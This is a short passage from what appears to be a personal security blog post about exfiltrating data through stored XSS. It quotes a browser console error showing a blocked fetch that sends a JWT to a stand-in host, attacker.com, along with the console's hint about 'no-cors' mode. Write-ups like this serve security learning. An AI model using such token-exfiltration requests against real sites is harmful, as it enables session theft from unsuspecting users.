andreathniah/bucketoftears/_posts/2023-03-17-stored-xss-data-exfiltration.md

 Nope-- what greeted me was this sad little error message in the console instead:

 > Access to fetch at 'https://attacker.com:8000/?jwt=xxx' from origin 'https://example.redacted.com' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.
->
-> If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled.

 Very sad indeed.